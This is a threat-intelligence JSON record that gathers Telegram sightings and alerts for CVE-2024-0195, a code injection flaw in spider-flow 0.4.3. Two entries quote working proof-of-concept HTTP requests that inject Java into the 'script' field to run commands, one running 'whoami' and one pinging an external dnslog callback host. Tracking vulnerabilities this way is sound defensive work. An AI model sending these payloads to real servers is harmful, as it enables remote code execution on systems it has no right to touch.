{"vulnerability": "CVE-2024-0195", "sightings": [{"uuid": "cbec503e-01b9-4ea0-8978-3a3d0d6980d9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-0195", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/3091", "content": "#exploit #poc", "creation_timestamp": "2024-08-31T11:11:03.000000Z"}, {"uuid": "da56b5b1-121d-4032-8abf-60f00775658e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-0195", "type": "published-proof-of-concept", "source": "https://t.me/realLulzSec/1887", "content": "CVE-2024-0195 Exploit\n\nPOST /function/save HTTP/1.1\nHost: 192.168.116.128:8080\nX-Requested-With: XMLHttpRequest\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nContent-Length: 139\n\nid=&name=test&parameter=test&script=return+java.lang.%2F****%2FRuntime%7D%3Br%3Dtest()%3Br.getRuntime().exec('ping+18k2tu.dnslog.cn')%3B%7B\n\n#exploit #poc", "creation_timestamp": "2024-09-01T16:43:36.000000Z"}, {"uuid": "646058b4-6247-4783-b42a-7171abd5c3ca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-0195", "type": "seen", "source": "https://t.me/cibsecurity/74202", "content": "\u203c\ufe0fCVE-2024-0195\u203c\ufe0f\n\nA vulnerability, which was classified as critical, was found in spiderflow 0.4.3. Affected is the function FunctionService.saveFunction of the file srcmainjavaorgspiderflowcontrollerFunctionController.java. The manipulation leads to code injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB249510 is the identifier assigned to this vulnerability.\n\n\ud83d\udcd6 Read more\n\nVia \"National Vulnerability Database\"", "creation_timestamp": "2024-01-03T01:37:23.000000Z"}, {"uuid": "8c67e884-66ad-4fa7-9610-3c5ae3002a77", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-0195", "type": "seen", "source": "https://t.me/ctinow/171359", "content": "https://ift.tt/Y1p6zLw\nCVE-2024-0195 | spider-flow 0.4.3 FunctionController.java FunctionService.saveFunction code injection", "creation_timestamp": "2024-01-22T19:11:04.000000Z"}, {"uuid": "9769123e-728e-401d-ad11-b92befff5b6e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-0195", "type": "seen", "source": "https://t.me/ctinow/162056", "content": "https://ift.tt/xaj4rfN\nCVE-2024-0195", "creation_timestamp": "2024-01-02T22:26:52.000000Z"}, {"uuid": "4fbd4f5e-c17e-4f50-b846-5eecff1ac145", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-0195", "type": "seen", "source": "https://t.me/ctinow/164842", "content": "https://ift.tt/zunW3Vx\nCVE-2024-0195 Exploit", "creation_timestamp": "2024-01-09T08:16:07.000000Z"}, {"uuid": "78c1275f-80da-4411-8ba9-2e55df0c87c4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-0195", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/1821", "content": "cve-2024-0195\n\nPOST /function/save HTTP/1.1\nHost: your-ip\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nAccept: */*\nAccept-Encoding: gzip, deflate\nX-Requested-With: XMLHttpRequest\n\nid=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('whoami')%3B%7B\n\n#poc  #exploit", "creation_timestamp": "2024-01-10T09:39:51.000000Z"}, {"uuid": "3edf5a23-0af6-482e-808d-b0154076fa9a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-0195", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8423", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-0195 Improper Control of Generation of Code ('Code Injection')\nURL\uff1ahttps://github.com/fa-rrel/CVE-2024-0195-SpiderFlow\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-08-31T07:39:53.000000Z"}, {"uuid": "898e3f8d-f43d-4d2c-b84a-5c1a55d69d8a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-0195", "type": "published-proof-of-concept", "source": "https://t.me/HackerArsenal/240", "content": "#exploit #poc", "creation_timestamp": "2024-08-31T14:58:47.000000Z"}]}